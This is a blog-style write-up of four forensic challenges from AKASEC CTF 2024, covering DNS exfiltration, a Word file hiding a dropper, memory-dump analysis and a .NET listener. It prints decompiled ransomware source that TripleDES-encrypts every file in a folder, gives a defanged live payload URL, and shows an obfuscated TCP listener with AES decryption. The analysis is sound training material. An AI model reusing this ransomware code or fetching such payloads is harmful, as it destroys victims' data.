Avatar
CTI Analyst at @ActiveFence
Forensic at @World Wide Flags
Operator at @Cookie Han Hoan

AKASEC CTF 2024

Hi everyone, this time me and World Wide Flags have joined AKASEC CTF, and fortunately, I solved all forensic challenges by myself (because noobthebox solved them too fast) and we’re in 3rd place. Because I’m lazy so I just write some challenges that I think it’s good with me. Let’s go!

image

Sussy

In this challenge, we will give a pcapng file, and we need to analyze it. First, open it in Wireshark:

image

As you can see right now in DNS packets, their query names is very weird, and each packet has a different name. This is the sign for DNS exfiltration and this is my solution:

  • First, extract all DNS query names:

image

  • Second, filter these query names that contain “akasec.ma”:

image

  • Third, you can see that it has some duplicated strings, so you need to remove that string by using uniq command:

image

  • Fourth, remove “akasec.ma” also “\n” to ensure that there’re just hex strings. I removed “akasec.ma” by my hand and write a Python script to remove “\n”:

      with open("C:\\Users\\Admin\\Downloads\\result4.txt", 'r') as file:
          arr = file.read().split() 
      print(''.join(arr))
    

    image

Now you have everything, just decode it (you can use CyberChef or xxd command):

image

You will see that there’s a 7z file, I tried to open it but it needed password:

image

From here I used 7z2john to extract hash of the file and use john to crack the hash. And after a short time, you will get hellokitty is the password for 7z file.:

image

You will get a file named flag, and it’s a PDF file (when you cat file, you will see PDF structure or you can check by using file):

image

Also it needs password, so you will do the same with 7z file by using pdf2john to extract hash, john to crack and you will get meow is the file password, open it and you will get the flag:

image

saveme

In this challenge they gave us a zip file contains a doc file and many images. First, I checked all images file and they’re corrupted, and I think that doc file did something to these images. Not waiting, I started analysing it by using olevba but there’s nothing:

image

I tried to use binwalk to extract files inside and read content of doc file in document.xml file and I found that there’s a weird string:

image

Open that file in Word you can see a long whitespace after image, and I fill that area by red color and I found that string:

image

After a short time I guessed it’s hex string that seperated by “&H”, I decided to write a Python script to solve it:

with open("C:\\Users\\Admin\\Documents\\Code\\Python\\payload", 'r') as file:
    payload = file.read().split("&H")
print(''.join(payload))

image

You can realise that 4D5A is signature for executable file, and we will take that output and decode from hex and save it to a file:

image

image

My next step is uploading that file to any.run for automatic analysis because that file has 32-bits infrastructure. In HTTP requests tab, you can see that powershell.exe downloaded ransomware from hxxp[://]20[.]81[.]130[.]178:8080/:

image

Because this URL’s still live, so I tried to download that file to my machine:

image

Check that file I found that it’s packed by .NET, so we can use dnSpy for reversing it:

image

// b
// Token: 0x06000003 RID: 3 RVA: 0x000020FC File Offset: 0x000002FC
private static void a(string[] A_0)
{
	string text = "Lp3jXluuW799rnu4";
	byte[] array = new byte[]
	{
		0,
		1,
		2,
		3,
		4,
		5,
		6,
		7
	};
	<Module>.h = 2081625616;
	byte[] array2 = array;
	string currentDirectory = Directory.GetCurrentDirectory();
	<Module>.k = -1592258590;
	<Module>.a = null;
	int num = 1386028750;
	int l = -1437277352;
	<Module>.n = -1592516334;
	<Module>.l = l;
	<Module>.d = num;
	string[] files = Directory.GetFiles(currentDirectory, "*.*");
	<Module>.n = 2136656571;
	string[] array3 = files;
	<Module>.d = null;
	string[] array4 = array3;
	int num2 = 0;
	bool flag;
	<Module>.g = flag;
	string text2;
	for (;;)
	{
		<Module>.k = 1326660401;
		<Module>.e = 1818084011;
		int num3 = num2;
		string[] array5 = array4;
		<Module>.j = -1529522494;
		bool flag2 = num3 < array5.Length;
		<Module>.o = 1526447315;
		<Module>.j = 1987339265;
		flag = flag2;
		bool flag3 = flag;
		<Module>.a = null;
		if (!flag3)
		{
			break;
		}
		<Module>.j = 1845842485;
		TripleDESCryptoServiceProvider tripleDESCryptoServiceProvider;
		<Module>.c = tripleDESCryptoServiceProvider;
		text2 = array4[num2];
		try
		{
			<Module>.q = -759738571;
			<Module>.b = null;
			<Module>.q = 1898371779;
			string path = text2;
			a.b = flag;
			byte[] array6 = File.ReadAllBytes(path);
			<Module>.g = null;
			a.b = "185ee01d-8c67-459c-9586-6804417e592ce434881f-7f35-4ffd-bdf6-4a1f244e25084e41b92d-afec-";
			<Module>.d = null;
			byte[] array7 = array6;
			<Module>.h = 1308380089;
			tripleDESCryptoServiceProvider = new TripleDESCryptoServiceProvider();
			SymmetricAlgorithm symmetricAlgorithm = tripleDESCryptoServiceProvider;
			Encoding ascii = Encoding.ASCII;
			string s = text;
			<Module>.k = 401140706;
			symmetricAlgorithm.Key = ascii.GetBytes(s);
			<Module>.o = 1203310366;
			SymmetricAlgorithm symmetricAlgorithm2 = tripleDESCryptoServiceProvider;
			byte[] iv = array2;
			c.b = text;
			symmetricAlgorithm2.IV = iv;
			byte[] array8 = b.b(array7, tripleDESCryptoServiceProvider);
			string path2 = text2;
			byte[] bytes = array8;
			<Module>.n = -1749758540;
			File.WriteAllBytes(path2, bytes);
			string str = "Encrypted: ";
			a.b = "102abfb4-ec8b-4922-9b54-2f17b2c5b52d6d";
			string str2 = text2;
			Exception ex;
			<Module>.a = ex;
			Console.WriteLine(str + str2);
			c.b = 1876936332;
		}
		catch (Exception ex2)
		{
			<Module>.m = -1040838703;
			Exception ex = ex2;
			string str3 = "Error: ";
			Exception ex3 = ex;
			a.b = tripleDESCryptoServiceProvider;
			string text3 = str3 + ex3.Message;
			<Module>.o = 1057425350;
			<Module>.d = null;
			Console.WriteLine(text3);
			a.b = "dd91927e-4e7c-4176-b90a-bb4a9049b638480c140d-829f-4";
			<Module>.e = 1957620381;
			<Module>.a = null;
			<Module>.m = -1748580011;
			int q = 2097519326;
			<Module>.m = -1932913121;
			<Module>.q = q;
		}
		<Module>.c = text2;
		<Module>.k = 480802764;
		object b = null;
		<Module>.a = flag;
		c.b = b;
		<Module>.h = num2;
		<Module>.g = text;
		int num4 = num2;
		int num5 = 1;
		<Module>.k = 2071185029;
		int num6 = num4 + num5;
		object g = null;
		c.a = tripleDESCryptoServiceProvider;
		<Module>.g = g;
		object b2 = 1952428595;
		<Module>.q = 1809257038;
		c.b = b2;
		num2 = num6;
	}
	Console.ReadLine();
	<Module>.j = num2;
	bool flag4 = flag;
	<Module>.o = 721847420;
	<Module>.l = 796469985;
	<Module>.q = -1051365525;
	<Module>.n = num2;
	<Module>.f = flag4;
	c.a = text2;
}

This is source code of that ransomware, let’s analyse it. The most important thing I noticed was it used triple DES to encrypt data:

tripleDESCryptoServiceProvider = new TripleDESCryptoServiceProvider();
SymmetricAlgorithm symmetricAlgorithm = tripleDESCryptoServiceProvider;
Encoding ascii = Encoding.ASCII;
string s = text;
<Module>.k = 401140706;
symmetricAlgorithm.Key = ascii.GetBytes(s);
<Module>.o = 1203310366;
SymmetricAlgorithm symmetricAlgorithm2 = tripleDESCryptoServiceProvider;
byte[] iv = array2;

DES3 still needs key and iv to decrypt, and you can see in this code, key is got from text which is “Lp3jXluuW799rnu4” and iv is a byte array contains value from 0 to 7. And what data we need to decrypt? It’s corrupted image. I tried with image 144… which is different from each other, used CyberChef for decryption and I got the flag:

image

Portugal

We have memory file, and volatility will work in this case. Not waiting, I checked processes list of this machine. google.exe looked most suspicious:

image

Follow the description, I’m sure that someone took advantage of the opportunity and was searching for something., keyword “searching” made me think about google history. Not waiting, I tried to extract google history file inside the memory file. You will look for History file in C:\Users\USER_NAME\AppData\Local\Google\Chrome\User Data\Default\History, extract it by windows.filescan plugin (do it by yourself):

image

The fastest way to read this file is use strings 😂😂😂 and you will find the flag that seperated by many parts:

image

Flag: AKASEC{V0L4T1L1TY_f0r_chr0m3_s34rc$h_h1st0ry}

snooz

I have to say this challenge is great in my opinion. If you want to know how it’s great, let’s solve this challenge. In this challenge they gave us 2 files: a memory file and a pcapng file. Let’s start with pcapng file:

image

You can see that there’re many packets between local and port 8000, watch stream of it, I saw some downloading actions in stream 3 and 6. From that I tried to extract these files:

image

The most suspicious file I noticed it’s download.dat. Read this file and I found that it was base64 string and when I decoded it, it’s a exe file packed by .NET:

image

Again, we can use dnSpy for reversing it:

  • In function a, it established connection with port 1337 and transfer data through it
	private static void a()
	{
		TcpListener tcpListener = new TcpListener(IPAddress.Any, 1337);
		<Module>.l = -1592258590;
		TcpListener tcpListener2 = tcpListener;
		object obj = null;
		object e = 1386028750;
		<Module>.o = 2136656571;
		<Module>.e = e;
		<Module>.a = obj;
		tcpListener2.Start();
		bool flag;
		<Module>.h = flag;
		for (;;)
		{
			flag = true;
			<Module>.k = 1987339265;
			<Module>.a = null;
			<Module>.g = flag;
			int num;
			<Module>.p = num;
			<Module>.r = -1051365525;
			NetworkStream stream;
			global::b.a = stream;
			TcpClient tcpClient = tcpListener.AcceptTcpClient();
			<Module>.i = 1057425350;
			stream = tcpClient.GetStream();
			byte[] array = new byte[1024];
			<Module>.e = null;
			byte[] array2 = array;
			<Module>.i = -1411494653;
			Stream stream2 = stream;
			byte[] buffer = array2;
			int offset = 0;
			<Module>.k = 1657774894;
			<Module>.q = 744302617;
			num = stream2.Read(buffer, offset, array2.Length);
			byte[] array3 = new byte[num];
			Array sourceArray = array2;
			int sourceIndex = 0;
			Array destinationArray = array3;
			int num2;
			int num3;
			int n;
			if ((4062 & -5420 + (num << 11)) == 0)
			{
				num2 = checked(2069871130 + -132655268);
				num3 = num2;
			}
			else
			{
				uint num4 = (uint)(4 & (num + num * 15 ^ 1587));
				uint num5 = 4U;
				n = <Module>.n;
				num3 = ((num4 != (num5 & (uint)((uint)n << 8) >> 5)) ? checked((int)(unchecked((long)(-2076188109 ^ 422676110)))) : (sizeof(long) + 17256));
			}
			<Module>.d = <Module>.c(num3, sizeof(Guid) + 18172, sizeof(float) + 107);
			Array.Copy(sourceArray, sourceIndex, destinationArray, 0, num);
			<Module>.n = -1040838703;
			<Module>.d = num;
			byte[] array4 = array3;
			int num6 = (((uint)(7364 + (num2 << 29)) >> 29 & 2U) == (uint)(~num2 - 2958 & 2)) ? (((((uint)(n * -1073741824) >> 10 ^ (uint)(n * 57 + 7 * n)) & 57U) == 0U) ? (Type.EmptyTypes.Length + 45957) : (Type.EmptyTypes.Length + 695708289)) : (-1673074294 ^ 37606627);
			int num7 = checked(-1218841169 + 1218888041);
			int num8;
			if (num / 16039 == -1845109675)
			{
				int o = <Module>.o;
				num8 = ((o * 12966 - -131 != (int)((uint)(o % 256 / 1972) >> 23)) ? (Type.EmptyTypes.Length + -884098835) : (Type.EmptyTypes.Length + 1457581078));
			}
			else
			{
				int num9 = 5009;
				int q = <Module>.q;
				num8 = ((num9 + (q << 20) + 483840 == (int)((uint)(~(uint)(q * 1073741824)) >> 17)) ? (Type.EmptyTypes.Length + -1963321438) : (Type.EmptyTypes.Length + 182));
			}
			byte[] array5 = global::a.b(array4, <Module>.c(num6, num7, num8));
			<Module>.e = null;
			Encoding utf = Encoding.UTF8;
			byte[] bytes = global::a.c(array5);
			<Module>.r = 2097519326;
			<Module>.d = <Module>.c(checked((int)44666.0), sizeof(int) + 45636, Type.EmptyTypes.Length + 219);
			string @string = utf.GetString(bytes);
			int num10 = sizeof(double) + 21715;
			int num11 = checked((int)22728L);
			string str = <Module>.c(num10, num11, sizeof(Guid) + 95);
			<Module>.i = 1503776956;
			Console.WriteLine(str + @string);
			global::b.b = 1952428595;
			tcpClient.Close();
			<Module>.k = -1529522494;
		}
	}
  • In function b, it used AES to encrypt data:
	private static byte[] b(byte[] A_0, string A_1)
	{
		Aes aes = Aes.Create();
		byte[] result;
		try
		{
			<Module>.i = 2081625616;
			SymmetricAlgorithm symmetricAlgorithm = aes;
			Encoding utf = Encoding.UTF8;
			int r = -1871252905;
			<Module>.m = -1437277352;
			<Module>.r = r;
			symmetricAlgorithm.Key = utf.GetBytes(A_1);
			SymmetricAlgorithm symmetricAlgorithm2 = aes;
			CipherMode mode = 2;
			<Module>.q = -1852116043;
			<Module>.e = null;
			symmetricAlgorithm2.Mode = mode;
			<Module>.l = -1410905245;
			ICryptoTransform cryptoTransform;
			object c = cryptoTransform;
			<Module>.k = 1845842485;
			<Module>.c = c;
			SymmetricAlgorithm symmetricAlgorithm3 = aes;
			PaddingMode padding = 1;
			object h = null;
			<Module>.b = null;
			<Module>.h = h;
			object d = <Module>.c(Type.EmptyTypes.Length + 8801, sizeof(uint) + 9765, sizeof(float) + 89);
			bool flag;
			<Module>.d = flag;
			<Module>.d = d;
			symmetricAlgorithm3.Padding = padding;
			<Module>.i = 1308380089;
			ICryptoTransform cryptoTransform2 = aes.CreateDecryptor();
			<Module>.m = -1557401652;
			cryptoTransform = cryptoTransform2;
			try
			{
				<Module>.p = 1203310366;
				ICryptoTransform cryptoTransform3 = cryptoTransform;
				int num = 0;
				object obj = aes;
				<Module>.o = -2051646939;
				global::b.b = obj;
				result = cryptoTransform3.TransformFinalBlock(A_0, num, A_0.Length);
			}
			finally
			{
				ICryptoTransform cryptoTransform4 = cryptoTransform;
				object obj2 = null;
				<Module>.a = result;
				global::b.b = 1876936332;
				flag = (cryptoTransform4 == obj2);
				if (!flag)
				{
					cryptoTransform.Dispose();
				}
				<Module>.o = -1978466511;
			}
		}
		finally
		{
			ICryptoTransform cryptoTransform;
			object c2 = cryptoTransform;
			object obj3 = null;
			<Module>.n = -1932913121;
			<Module>.a = obj3;
			<Module>.f = 1957620381;
			<Module>.c = c2;
			<Module>.q = -1950879357;
			Aes aes2 = aes;
			object obj4 = null;
			object h2 = aes;
			bool flag;
			<Module>.a = flag;
			<Module>.h = h2;
			global::b.b = obj4;
			object obj5 = null;
			object h3 = null;
			<Module>.r = 1809257038;
			<Module>.h = h3;
			global::b.a = cryptoTransform;
			<Module>.i = -563903361;
			flag = (aes2 == obj5);
			<Module>.f = 1818084011;
			if (!flag)
			{
				aes.Dispose();
			}
		}
		<Module>.m = 796469985;
		<Module>.o = -1980982856;
		return result;
	}

Now we will return to pcapng file to find data was transfered through port 1337:

image

image

Import it to CyberChef with key is fr33___p4l3571n3 (in source code) and mode is ECB:

image

You can see that they mentioned something about pastecode, so I decided to string the memory (becuz I’m lazy):

image

Open this link, you will see it’s protected and we just type the password we found and we can read the content:

image

It’s base64 string, so I decoded it, saved it in a file and I found that it’s zip file protected by password:

image

Now we need to use memdump for more clues, I extracted processes list inside the memory:

image

Look for a long time and I found a notepad process was running, so I will use GIMP method to watch the screen at that moment (I wrote a writeup about it, you can check in MireaCTF) and I really found password for zip file:

image

Open it and you will get an image (tired…):

image

image

It’s not the flag… and from here I tried to use stegseek and I really found flag here!!!!!!!!!!!!!!!!!!! (so happy):

image

image

all tags